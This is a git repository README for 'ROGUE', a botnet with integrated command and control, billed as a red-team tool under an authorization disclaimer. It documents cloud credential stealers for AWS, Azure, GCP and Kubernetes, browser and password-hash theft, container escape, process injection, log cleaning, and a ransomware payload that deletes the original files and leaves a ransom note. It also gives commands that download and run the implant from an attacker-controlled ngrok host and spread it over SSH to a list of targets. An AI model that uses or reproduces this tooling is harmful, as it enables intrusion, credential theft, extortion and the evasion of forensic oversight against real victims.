ek0mssavi0r/Rogue
1
0
Fork 1
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
7954f61952
Rogue/README.md
ek0ms savi0r 7954f61952 Upload files to "/"
2026-05-31 04:10:03 +00:00

1104 lines
30 KiB
Markdown
Raw Blame History

# ROGUE - Botnet w/ Integrated C2 v3.2
![ek0ms Banner](https://img.shields.io/badge/ek0ms-certified_ethcial_hacker-blue)
![rogue banner](https://github.com/user-attachments/assets/7dd2e5a3-398a-4487-a46b-541673b0f3b3)
**ROGUE** v3.2 is a comprehensive encrypted command-and-control framework designed for authorized penetration testing, red team operations, and incident response training. Featuring AES-256 encryption, web-based administration, cloud-awareness, and an extensive payload arsenal, ROGUE provides professional-grade capabilities for security testing.
## Disclaimer: This tool is provided for educational purposes. Only use on systems you own or have written permission to test on.
---
## What's New in v3.2
### **Cloud-Aware Implant & C2 (NEW!)**
- **Automatic Cloud Environment Detection** - AWS, Azure, GCP, Docker, Kubernetes
- **Cloud-Specific Tactics** - Environment-adapted persistence and evasion
- **Cloud Operations Tab** - Dedicated interface for cloud exploitation
- **Provider-Specific Payloads** - AWS/Azure/GCP credential harvesters
- **Container Escape & K8s Exploitation** - Advanced container-aware operations
### **Advanced Payload Suite**
- **20+ Professional Payloads** including cloud-specific modules
- **5 New Cloud Payloads** for cloud environment exploitation
- **Cloud-Aware Persistence** - Adapts to AWS/Azure/GCP/Container environments
- **Automatic Environment Adaptation** - Changes tactics based on detected cloud provider
- **Cloud Reconnaissance** - Provider-specific intelligence gathering
### **Cloud Payloads (NEW)**
- **Cloud Detector** (`cloud_detector.py`) - Detect cloud environment and adapt behavior
- **AWS Credential Stealer** (`aws_credential_stealer.py`) - Harvest AWS credentials and metadata
- **Azure Credential Harvester** (`azure_cred_harvester.py`) - Steal Azure tokens and credentials
- **Container Escape** (`container_escape.py`) - Escape containerized environments
- **Kubernetes Secret Stealer** (`k8s_secret_stealer.py`) - Harvest K8s secrets and configs
### **Web Interface**
- **Cloud Operations Tab** - Dedicated cloud exploitation interface
- **Cloud Info Display** - Real-time cloud environment detection in bot list
- **Provider-Specific Operations** - AWS, Azure, GCP, Container/Kubernetes
- **Cloud Environment Scanner** - Integrated cloud reconnaissance tool
- **Adaptive Implant Settings** - Cloud-aware hidden directories and persistence
### **Advanced Features (v3.1)**
- **4 Advanced Payloads** for elite stealth and persistence
- **File Encryption Payload** - AES-256 encryption/decryption (DESTRUCTIVE - use with caution)
- **Compound Operations** for automated red team workflows
- **Tabbed Web Interface** with dedicated advanced operations section
- **Process Injection & File Hiding** for maximum stealth
---
## Cloud-Aware Features (NEW in v3.2)
### **Automatic Cloud Detection**
The implant automatically detects:
- **AWS EC2 instances** via metadata service (169.254.169.254)
- **Azure VMs** through Azure instance metadata
- **Google Cloud VMs** via GCP metadata service
- **Docker containers** via /.dockerenv and cgroups
- **Kubernetes pods** via service account mounts
- **Generic containers** through cgroup analysis
### **Cloud-Adaptive Behavior**
Based on detected environment:
- **Hidden Directory Selection** - Chooses optimal stealth locations
- **Persistence Mechanism Adaptation** - Uses cloud-native persistence
- **Tactics Selection** - Environment-specific exploitation methods
- **Payload Pre-fetching** - Downloads relevant cloud payloads
- **Communication Adaptation** - Adjusts beaconing for cloud networks
### **Cloud-Specific Persistence**
#### **AWS Persistence:**
- Cloud-init user-data modification
- Instance metadata cron jobs
- AWS-specific service creation
- EC2 tag-based persistence
#### **Azure Persistence:**
- VM Agent extension installation
- Azure cloud-init configuration
- Custom script extensions
- Azure-specific scheduled tasks
#### **GCP Persistence:**
- Google Cloud startup scripts
- GCP cloud-init configuration
- Instance metadata-based triggers
- Custom metadata persistence
#### **Container Persistence:**
- Docker socket exploitation
- Memory-only execution
- Container image modification
- Kubernetes cron jobs
### **Cloud Operations Interface**
Access via: `http://localhost:4444/admin` → "Cloud Ops" tab
#### **Cloud Detection**
```bash
trigger_cloud_detect # Detect cloud environment
trigger_cloud_recon # Execute cloud reconnaissance
```
#### **AWS Operations**
```bash
trigger_aws_creds # Steal AWS credentials and metadata
trigger_aws_enum # Enumerate AWS resources
load_payload aws_lateral.py # Load AWS lateral movement
```
#### **Azure Operations**
```bash
trigger_azure_creds # Steal Azure credentials
trigger_azure_enum # Enumerate Azure resources
load_payload azure_lateral.py # Load Azure lateral movement
```
#### **GCP Operations**
```bash
trigger_gcp_creds # Steal GCP credentials
trigger_gcp_enum # Enumerate GCP resources
load_payload gcp_lateral.py # Load GCP lateral movement
```
#### **Container Operations**
```bash
trigger_container_escape # Attempt container escape
trigger_k8s_creds # Steal Kubernetes credentials
load_payload docker_breakout.py # Load container breakout
```
#### **Cloud Environment Scanner**
- Full cloud scan (metadata, credentials, resources)
- Credentials-only scan
- Metadata-only collection
- Implant adaptation to cloud
---
## Installation & Setup
### **Clone Repository**
```bash
git clone https://git.churchofmalware.org/ek0mssavi0r/Rogue.git
cd rogue
```
### **Install Dependencies**
```bash
# Core dependencies
sudo apt update
sudo apt install python3 python3-pip python3-dev python3-venv -y
# Install Python packages
pip3 install pycryptodomex flask requests psutil setproctitle netifaces paramiko pynput --break-system-packages
# Optional for cloud features
pip3 install boto3 azure-identity google-cloud-storage kubernetes --break-system-packages
# For advanced payloads
pip3 install pyautogui python-nmap secretstorage --break-system-packages
```
**Note:** If you don't want to use `--break-system-packages`, make a venv and do it from there:
```bash
python3 -m venv rogue_env
source rogue_env/bin/activate
pip3 install pycryptodome flask requests psutil setproctitle netifaces paramiko pynput boto3 azure-identity google-cloud-storage kubernetes pyautogui python-nmap secretstorage
```
### **Ngrok Setup**
```bash
# Download and install ngrok
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar -xvzf ngrok-v3-stable-linux-amd64.tgz
sudo mv ngrok /usr/local/bin/
# Set up authentication
ngrok config add-authtoken YOUR_NGROK_AUTH_TOKEN
```
---
## Quick Start Guide
### **1. Start C2 Server** (Control Center)
```bash
python3 rogue_c2.py
```
**Expected Output:**
```
============================================================
ROGUE C2 SERVER - Complete Command & Control
============================================================
[+] Exfil listener started on port 9091
[+] Reverse shell listener started on port 9001
[*] Starting ngrok tunnel...
[+] C2 SERVER IS LIVE!
[NGROK] C2 URL: https://your-subdomain.ngrok-free.dev
[NGROK] Hostname: your-subdomain.ngrok-free.dev
[NGROK] Payloads: https://your-subdomain.ngrok-free.dev/payloads/
[ADMIN] Web Panel: http://localhost:4444/admin
[CLOUD] 5 Cloud Payloads Added: Cloud Detector, AWS/Azure/GCP Stealers, Container Escape, K8s Stealer
[ADVANCED] 4 Advanced Payloads: Process Injection, File Hider, Cron Persist, Competitor Cleaner
[FILE ENCRYPTION] System-wide modes: system_test, system_user, system_aggressive, system_destructive
============================================================
```
### **2. Configure Implant**
Edit `rogue_implant.py` with your C2 details:
```python
C2_HOST = 'your-ngrok-subdomain.ngrok-free.dev'
C2_PORT = 4444
PAYLOAD_REPO = "https://your-ngrok-subdomain.ngrok-free.dev/payloads/"
```
### **3. Deploy Implants**
**Manual Deployment:**
```bash
python3 rogue_implant.py
```
**Cloud Deployment Example (AWS):**
```bash
# Deploy to AWS EC2 via user-data
cat > user-data.sh << 'EOF'
#!/bin/bash
wget https://your-ngrok-subdomain.ngrok-free.dev/payloads/rogue_implant.py -O /tmp/rogue.py
python3 /tmp/rogue.py &
EOF
# Launch EC2 with user-data
aws ec2 run-instances --image-id ami-12345678 --user-data file://user-data.sh
```
**Mass Deployment (SSH):**
```bash
for ip in $(cat targets.txt); do
scp rogue_implant.py user@$ip:/tmp/ && \
ssh user@$ip "cd /tmp && python3 rogue_implant.py &"
done
```
**Container Deployment:**
```bash
# Inject into running container
docker cp rogue_implant.py container_name:/tmp/
docker exec container_name python3 /tmp/rogue_implant.py &
# Or build into container image
echo "CMD python3 /app/rogue_implant.py" >> Dockerfile
```
---
## Web Interface Guide
### **Access Control Panel**
```
http://localhost:4444/admin
```
### **Interface Layout**
#### **Tab 1: Active Bots**
- View connected implants with real-time status
- **Cloud Info Display** - Shows detected cloud environment
- Send commands to individual bots
- Monitor command results and pending queues
- Color-coded status indicators (green = active, teal = cloud-detected)
- **File Encryption Tool** - Dedicated interface with warnings
- **Advanced Payloads Section** - Quick access to new capabilities
#### **Tab 2: Operations**
**Cloud-Aware Operations (NEW):**
```bash
trigger_cloud_detect # Detect cloud environment
trigger_cloud_recon # Cloud-specific reconnaissance
trigger_aws_creds # AWS credential harvesting
trigger_azure_creds # Azure credential harvesting
trigger_gcp_creds # GCP credential harvesting
trigger_container_escape # Container escape attempt
trigger_k8s_creds # Kubernetes credential harvesting
```
**Reconnaissance & Intelligence** (Enhanced):
```bash
trigger_sysrecon # Comprehensive system reconnaissance
trigger_linpeas # Linux privilege escalation checker
trigger_hashdump # Password hash extraction
trigger_browsersteal # Browser credential theft
trigger_network_scan # Network host discovery
```
**Advanced Operations:**
```bash
trigger_procinject # Process injection for stealth execution
trigger_filehide # Advanced file hiding techniques
trigger_cronpersist # Advanced cron persistence methods
trigger_compclean # Clean competitor malware/botnets
```
**Compound Operations:**
```bash
trigger_full_recon # Complete reconnaissance suite
trigger_harvest_all # Comprehensive data collection
trigger_clean_sweep # Forensic cleanup & restart
```
**File Operations (DESTRUCTIVE):**
```bash
trigger_fileransom encrypt /path [password] # Encrypt files (removes originals)
trigger_fileransom decrypt /path <password> # Decrypt files with password
```
**Persistence & Stealth:**
```bash
trigger_stealthinject # PolyRoot persistence installation
trigger_persistence_setup # Additional persistence mechanisms
trigger_defense_evasion # Anti-forensic techniques
trigger_logclean # System log cleaning
```
#### **Tab 3: Payloads**
- Browse available payloads
- **Cloud Payloads Section** (NEW) - AWS/Azure/GCP/Container/K8s tools
- Direct load/run buttons
- Payload descriptions and categories
- Organized by operation type
- **File Encryption** marked with orange warnings
- **Advanced Payloads** marked with purple "NEW" badges
- **Cloud Payloads** marked with teal "CLOUD" badges
#### **Tab 4: Advanced**
- **Process Injection** - Inject implant into legitimate processes
- **Advanced File Hider** - Hide files using advanced techniques
- **Advanced Cron Persistence** - Sophisticated cron-based persistence
- **Competitor Cleaner** - Remove other malware/botnets
- Advanced operations console for elite payloads
#### **Tab 5: Cloud Ops (NEW)**
- **Cloud Detection** - Environment detection and adaptation
- **AWS Operations** - AWS-specific credential harvesting and enumeration
- **Azure Operations** - Azure credential harvesting and resource discovery
- **GCP Operations** - Google Cloud Platform credential harvesting
- **Container Operations** - Container escape and Kubernetes exploitation
- **Cloud Environment Scanner** - Full cloud reconnaissance tool
- **Adapt Implant to Cloud** - Automatic environment adaptation
#### **Tab 6: Results**
- Command execution history
- Timestamped results
- Filter by bot ID
- Export capabilities
#### **Tab 7: Server Status**
- Server uptime
- Ngrok tunnel status
- Active bot count
- System resource monitoring
- Advanced payloads count
- Cloud payloads count
---
## Payload Reference
### **Cloud Payloads (NEW)**
#### **Cloud Detector** (`cloud_detector.py`)
```bash
trigger_cloud_detect
```
**Detects:**
- AWS EC2 instances via metadata service
- Azure VMs through Azure instance metadata
- Google Cloud VMs via GCP metadata
- Docker containers via /.dockerenv
- Kubernetes pods via service accounts
- Generic container environments
**Features:**
- Automatic environment adaptation
- Cloud-specific tactic selection
- Provider identification with confidence levels
- Metadata collection for intelligence
#### **AWS Credential Stealer** (`aws_credential_stealer.py`)
```bash
trigger_aws_creds
```
**Collects:**
- IAM role credentials from metadata
- AWS CLI configuration files (~/.aws/)
- Environment variables with AWS keys
- EC2 instance metadata
- S3 bucket access keys
**Features:**
- Automatic credential validation
- Permission enumeration
- Region discovery
- Service access testing
#### **Azure Credential Harvester** (`azure_cred_harvester.py`)
```bash
trigger_azure_creds
```
**Harvests:**
- Managed identity tokens
- Azure CLI credentials
- Service principal configurations
- VM metadata and tags
- Key Vault access patterns
**Features:**
- Token acquisition and validation
- Subscription enumeration
- Resource group discovery
- Role assignment analysis
#### **Container Escape** (`container_escape.py`)
```bash
trigger_container_escape
```
**Techniques:**
- Docker socket exploitation
- Privilege escalation via capabilities
- Mount namespace breakout
- Kernel module loading
- Cgroup manipulation
**Features:**
- Multiple escape vector attempts
- Success probability assessment
- Post-escape host reconnaissance
- Persistence establishment on host
#### **Kubernetes Secret Stealer** (`k8s_secret_stealer.py`)
```bash
trigger_k8s_creds
```
**Steals:**
- Kubernetes service account tokens
- ConfigMaps with sensitive data
- Secrets from all namespaces
- kubeconfig files
- Cluster role bindings
**Features:**
- Namespace enumeration
- Secret extraction and decryption
- Cluster privilege escalation
- Lateral movement planning
### **Core Payloads**
#### **System Reconnaissance** (`sysrecon.py`)
```bash
trigger_sysrecon
```
**Collects:**
- System hardware information
- Network configuration
- User accounts and privileges
- Running processes and services
- Installed software inventory
- Security defenses status
#### **Privilege Escalation** (`linpeas_light.py`)
```bash
trigger_linpeas
```
**Checks:**
- Sudo privileges and misconfigurations
- SUID/SGID binaries
- World-writable files and directories
- Cron job vulnerabilities
- Kernel exploits
- Linux capabilities
#### **Credential Access** (`hashdump.py`)
```bash
trigger_hashdump
```
**Extracts:**
- Linux password hashes (/etc/shadow)
- Windows SAM hashes (if available)
- SSH private/public keys
- Browser saved credentials
- Memory credential artifacts
### **Advanced Payloads**
#### **Process Injection** (`process_inject.py`)
```bash
trigger_procinject
```
**Features:**
- Inject Rogue implant into legitimate system processes
- Memory-only execution to bypass file scanning
- Target processes: systemd, sshd, nginx, apache
- Persist across reboots via injected processes
- Bypass traditional process monitoring tools
#### **Advanced File Hider** (`advanced_filehider.py`)
```bash
trigger_filehide
```
**Features:**
- Hide files using Linux extended attributes
- Dot-prefix manipulation and hidden directories
- Filesystem tunneling techniques
- Anti-forensics methods to evade detection
- Make files invisible to standard system tools
#### **Advanced Cron Persistence** (`advanced_cron_persistence.py`)
```bash
trigger_cronpersist
```
**Features:**
- Randomized execution times to evade pattern detection
- Obfuscated cron entries that appear legitimate
- Multiple backup persistence methods
- Self-healing capability if removed
- Anti-forensic techniques to hide cron jobs
#### **Competitor Cleaner** (`competitor_cleaner.py`)
```bash
trigger_compclean
```
**Features:**
- Detect and remove common malware families
- Clean competitor C2 implants and backdoors
- Remove unauthorized persistence mechanisms
- System sanitization for exclusive control
- Identify and neutralize threat actors on the system
#### **File Encryption** (`fileransom.py`) - **DESTRUCTIVE**
```bash
trigger_fileransom encrypt /path [password] # Encrypt files
trigger_fileransom decrypt /path <password> # Decrypt files
```
**Features:**
- AES-256 military-grade encryption
- Password-protected encryption/decryption
- Auto-generates strong passwords
- Creates ransom note with recovery instructions
- Saves encryption log with password
- **WARNING:** Removes original files permanently
---
## Cloud-Aware Operations Guide
### **Cloud Environment Detection**
#### **Manual Cloud Detection**
```bash
# From C2 web interface (Cloud Ops tab):
trigger_cloud_detect
# Or directly via command:
send_https_command("trigger_cloud_detect")
```
#### **Cloud Reconnaissance**
```bash
# Comprehensive cloud reconnaissance
trigger_cloud_recon
# This will:
# 1. Detect cloud provider
# 2. Gather provider-specific metadata
# 3. Collect available credentials
# 4. Enumerate accessible resources
```
### **Cloud-Specific Exploitation**
#### **AWS Exploitation Chain**
```bash
# 1. Detect AWS environment
trigger_cloud_detect
# 2. Steal AWS credentials
trigger_aws_creds
# 3. Enumerate AWS resources
trigger_aws_enum
# 4. Attempt lateral movement within AWS
load_payload aws_lateral.py
```
#### **Azure Exploitation Chain**
```bash
# 1. Detect Azure environment
trigger_cloud_detect
# 2. Harvest Azure credentials
trigger_azure_creds
# 3. Enumerate Azure resources
trigger_azure_enum
# 4. Attempt lateral movement in Azure
load_payload azure_lateral.py
```
#### **Container Escape Chain**
```bash
# 1. Detect container environment
trigger_cloud_detect
# 2. Attempt container escape
trigger_container_escape
# 3. If successful, deploy to host
trigger_persistence_setup
# 4. Clean container traces
trigger_logclean
```
#### **Kubernetes Exploitation**
```bash
# 1. Detect Kubernetes environment
trigger_cloud_detect
# 2. Steal Kubernetes secrets
trigger_k8s_creds
# 3. Enumerate cluster resources
# (Manual commands via kubectl if available)
# 4. Attempt lateral movement in cluster
load_payload k8s_lateral.py
```
### **Cloud-Aware Persistence**
#### **Automatic Persistence Adaptation**
The implant automatically adapts persistence based on detected environment:
**In AWS:**
- Modifies cloud-init user-data
- Creates EC2 metadata-based cron jobs
- Uses AWS-specific service mechanisms
**In Azure:**
- Installs VM Agent extensions
- Modifies Azure cloud-init configurations
- Creates Azure-specific scheduled tasks
**In GCP:**
- Adds Google Cloud startup scripts
- Modifies GCP cloud-init configurations
- Uses instance metadata for triggers
**In Containers:**
- Uses Docker socket for persistence
- Implements memory-only execution
- Creates container-specific cron jobs
#### **Manual Persistence Commands**
```bash
# Force cloud-aware persistence setup
# (Automatic on implant startup when cloud detected)
# Check current persistence status
trigger_status
# Verify cloud adaptation
cat ~/.cache/.rogue/cloud_detection.json 2>/dev/null
```
### **Cloud Intelligence Gathering**
#### **Metadata Collection**
```bash
# AWS metadata
curl http://169.254.169.254/latest/meta-data/ 2>/dev/null
# Azure metadata
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# GCP metadata
curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/"
```
#### **Credential Discovery**
```bash
# Check for cloud credentials
find / -name ".aws" -o -name ".azure" -o -name ".config/gcloud" 2>/dev/null
# Check environment variables
env | grep -i aws\|azure\|gcp\|cloud
# Check running processes for cloud tools
ps aux | grep -i aws\|az\|gcloud\|kubectl
```
### **Cloud-Specific Evasion**
#### **AWS Evasion**
- Use IMDSv2 tokens for metadata access
- Leverage AWS roles instead of stored credentials
- Use VPC endpoints to avoid internet exposure
- Implement request signing for API calls
#### **Azure Evasion**
- Use managed identities instead of service principals
- Leverage Azure Key Vault for secret storage
- Use private endpoints for Azure services
- Implement token caching to reduce authentication frequency
#### **Container Evasion**
- Use ephemeral containers with no persistence
- Implement memory-only execution
- Leverage sidecar containers for C2
- Use Kubernetes jobs for ephemeral tasks
---
## Advanced Usage
### **Compound Cloud Operations**
#### **Complete Cloud Reconnaissance**
```bash
trigger_full_recon # Includes cloud detection if in cloud
```
**When in cloud environment, this also:**
1. Detects cloud provider and type
2. Collects cloud metadata
3. Gathers available credentials
4. Enumerates cloud resources
5. Maps network topology within cloud
#### **Cloud Data Harvest**
```bash
trigger_harvest_all # Enhanced for cloud environments
```
**Cloud-enhanced collection:**
- Cloud credential harvesting (AWS/Azure/GCP)
- Cloud metadata exfiltration
- Container/Kubernetes secret collection
- Cloud storage bucket enumeration
- Database credential extraction
### **Stealth in Cloud Environments**
#### **Cloud-Native Stealth Techniques**
```bash
# Use cloud-native services for stealth
trigger_cloud_detect # First, understand environment
# Then apply appropriate stealth:
if AWS:
trigger_procinject # Process injection
trigger_filehide # Advanced file hiding
# Use AWS CloudWatch for log obfuscation
if Container:
trigger_container_escape # Escape to host
trigger_memory_persistence # Memory-only execution
# Use container orchestration for hiding
if Kubernetes:
trigger_k8s_creds # Steal service account
# Use K8s jobs for ephemeral execution
# Leverage K8s network policies for stealth
```
#### **Cloud Log Evasion**
```bash
# Cloud-specific log cleaning
trigger_logclean # Enhanced for cloud logs
# Cloud-specific targets:
# AWS: CloudTrail, CloudWatch, VPC Flow Logs
# Azure: Activity Logs, Monitor, Network Watcher
# GCP: Cloud Audit Logs, VPC Flow Logs, Operations
```
### **Cloud Lateral Movement**
#### **Within Cloud Provider**
```bash
# AWS lateral movement
load_payload aws_lateral.py
# This payload can:
# 1. Use stolen credentials to access other instances
# 2. Enumerate security groups for accessible ports
# 3. Attempt SSH/RDP connections to other instances
# 4. Deploy implants via AWS Systems Manager
```
#### **Cross-Cloud Movement**
```bash
# If credentials allow multiple cloud access
# Manual steps:
# 1. Harvest credentials from current cloud
# 2. Test credentials against other cloud providers
# 3. Deploy implants to accessible clouds
# 4. Establish cross-cloud C2 channels
```
---
## Emergency Procedures
### **Cloud-Specific Emergency Removal**
#### **AWS Removal**
```bash
# Remove from AWS instance
sudo pkill -9 -f rogue
sudo rm -rf ~/.cache/.rogue
sudo rm -rf /var/lib/cloud/.cache
# Clean cloud-init modifications
sudo sed -i '/ROGUE\|rogue_agent/d' /etc/cloud/cloud.cfg
# Remove AWS cron jobs
sudo rm -f /etc/cron.d/aws-monitor
```
#### **Azure Removal**
```bash
# Remove from Azure VM
sudo pkill -9 -f rogue
sudo rm -rf ~/.cache/.rogue
sudo rm -rf /var/lib/waagent/custom-script
# Clean Azure extensions
sudo find /var/lib/waagent -name "*rogue*" -delete
```
#### **Container Removal**
```bash
# Remove from container
pkill -9 -f rogue
rm -rf /.cache/.rogue
# Check for host escape
ps aux | grep -E "docker|containerd|kube" | grep -v grep
# If escaped to host, clean host as well
```
#### **Kubernetes Removal**
```bash
# Remove from Kubernetes pod
pkill -9 -f rogue
rm -rf /.cache/.rogue
# Check for cluster-wide deployment
kubectl get jobs,cronjobs,deployments -A | grep -i rogue
# Remove any Rogue-related resources
kubectl delete -f rogue-manifest.yaml 2>/dev/null
```
### **Cloud Forensic Detection**
#### **Indicators of Compromise (Cloud)**
```bash
# Check for cloud-specific IoCs
# AWS: Unusual IAM role usage, unexpected metadata queries
# Azure: Unusual managed identity usage, unexpected extension installs
# GCP: Unusual service account usage, unexpected metadata access
# Containers: Container escape attempts, unusual host mounts
```
#### **Cloud Log Analysis**
```bash
# Check cloud provider logs
# AWS CloudTrail, CloudWatch
# Azure Activity Logs, Monitor
# GCP Cloud Audit Logs, Operations
# Container: Docker/Container logs
# Kubernetes: K8s audit logs
```
---
## Troubleshooting
### **Cloud-Specific Issues**
#### **Cloud Detection Failures**
```bash
# Test cloud detection manually
python3 -c "
import urllib.request
import socket
socket.setdefaulttimeout(2)
try:
req = urllib.request.Request('http://169.254.169.254/latest/meta-data/')
urllib.request.urlopen(req)
print('AWS detected')
except:
print('Not AWS or metadata blocked')
"
# Check for metadata service access
curl -s http://169.254.169.254/latest/meta-data/ 2>/dev/null || echo "AWS metadata unavailable"
curl -H Metadata:true 'http://169.254.169.254/metadata/instance?api-version=2021-02-01' 2>/dev/null || echo "Azure metadata unavailable"
curl -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/' 2>/dev/null || echo "GCP metadata unavailable"
```
#### **Cloud Credential Issues**
```bash
# Check for cloud credentials
ls -la ~/.aws/ ~/.azure/ ~/.config/gcloud/ 2>/dev/null
# Test AWS credentials
aws sts get-caller-identity 2>/dev/null || echo "AWS credentials not configured"
# Test Azure credentials
az account show 2>/dev/null || echo "Azure credentials not configured"
# Test GCP credentials
gcloud config list 2>/dev/null || echo "GCP credentials not configured"
```
#### **Container Escape Failures**
```bash
# Check container environment
cat /.dockerenv 2>/dev/null && echo "Running in Docker"
cat /proc/1/cgroup | grep -i docker && echo "Docker container detected"
ls /var/run/secrets/kubernetes.io/serviceaccount 2>/dev/null && echo "Kubernetes pod detected"
# Check for escape vectors
ls -la /var/run/docker.sock 2>/dev/null && echo "Docker socket accessible"
find / -perm -4000 2>/dev/null | head -10
```
#### **Kubernetes Issues**
```bash
# Check Kubernetes environment
env | grep -i kubernetes
ls /var/run/secrets/kubernetes.io/serviceaccount 2>/dev/null
# Test Kubernetes access
kubectl get pods 2>/dev/null || echo "kubectl not available or no permissions"
curl -s -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces/default/pods 2>/dev/null | head -5
```
### **General Troubleshooting**
#### **Ngrok Connection Issues:**
```bash
# Check ngrok status
curl http://localhost:4040/api/tunnels
# Restart ngrok
pkill ngrok
ngrok http 4444
sleep 5
```
#### **Implant Not Connecting:**
```bash
# Test C2 connectivity from target
curl -k https://your-c2.ngrok-free.dev
# Check implant logs
cat ~/.cache/.rogue/.implant.log 2>/dev/null
# Verify cloud detection worked
cat ~/.cache/.rogue/cloud_detection.json 2>/dev/null
```
---
## Command Quick Reference
### **Cloud Commands (NEW)**
```bash
# Cloud Detection & Recon
trigger_cloud_detect # Detect cloud environment
trigger_cloud_recon # Cloud-specific reconnaissance
trigger_cloud_scan full # Full cloud environment scan
# AWS Operations
trigger_aws_creds # Steal AWS credentials
trigger_aws_enum # Enumerate AWS resources
# Azure Operations
trigger_azure_creds # Steal Azure credentials
trigger_azure_enum # Enumerate Azure resources
# GCP Operations
trigger_gcp_creds # Steal GCP credentials
trigger_gcp_enum # Enumerate GCP resources
# Container Operations
trigger_container_escape # Container escape attempt
trigger_k8s_creds # Kubernetes credential harvesting
```
### **Essential Commands**
```bash
# System Information
whoami
uname -a
ip a
ps aux
# Cloud Information
env | grep -i cloud
curl -s http://169.254.169.254/latest/meta-data/ 2>/dev/null | head -5
```
### **Trigger Commands (C2 Panel)**
```bash
# Reconnaissance
trigger_sysrecon
trigger_linpeas
trigger_hashdump
trigger_browsersteal
# Advanced Payloads
trigger_procinject
trigger_filehide
trigger_cronpersist
trigger_compclean
# Cloud Operations
trigger_cloud_detect
trigger_aws_creds
trigger_azure_creds
trigger_container_escape
# File Operations (DESTRUCTIVE)
trigger_fileransom encrypt /path [password]
trigger_fileransom decrypt /path <password>
# Operations
trigger_full_recon
trigger_harvest_all
trigger_clean_sweep
# Management
trigger_status
trigger_self_update
trigger_help
```
### **Payload Commands**
```bash
# Load and execute
load_payload sysrecon.py
run_payload sysrecon.py
# Cloud payloads
load_payload cloud_detector.py
run_payload cloud_detector.py
# Advanced payloads
load_payload process_inject.py
run_payload process_inject.py
# File Encryption (use with extreme caution)
load_payload fileransom.py
run_payload fileransom.py
```
---
## Disclaimer
### **!!!EXTREME WARNING DISCLAIMER!!!**
```
THE FILE ENCRYPTION PAYLOAD (fileransom.py) IS DESTRUCTIVE SOFTWARE.
It PERMANENTLY REMOVES ORIGINAL FILES during encryption.
Files are only recoverable with the correct password.
THE CLOUD EXPLOITATION FEATURES ARE FOR AUTHORIZED TESTING ONLY.
Unauthorized access to cloud resources is illegal and unethical.
THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND.
The author assumes NO LIABILITY for data loss, misuse, or damage caused by this software.
Users must:
1. Obtain proper authorization before use
2. Only use in isolated test environments
3. Maintain backups of all important data
4. Assume full responsibility for encryption password management
5. Only test cloud environments you own or have written permission to test
6. Comply with all cloud provider terms of service
```
---
*Last Updated: v3.2 | For authorized security testing only*
**CLOUD EXPLOITATION: Use only on cloud environments you own or have explicit permission to test**
**FILE ENCRYPTION: Use with extreme caution in isolated environments only**
---
![rogue](https://github.com/user-attachments/assets/d8c0e482-efa0-4f43-86dc-bf8e15505520)
![image0(1)](https://github.com/user-attachments/assets/0a84dbd2-5028-40e9-ae8d-fc046114b94f)
Reference in New Issue View Git Blame Copy Permalink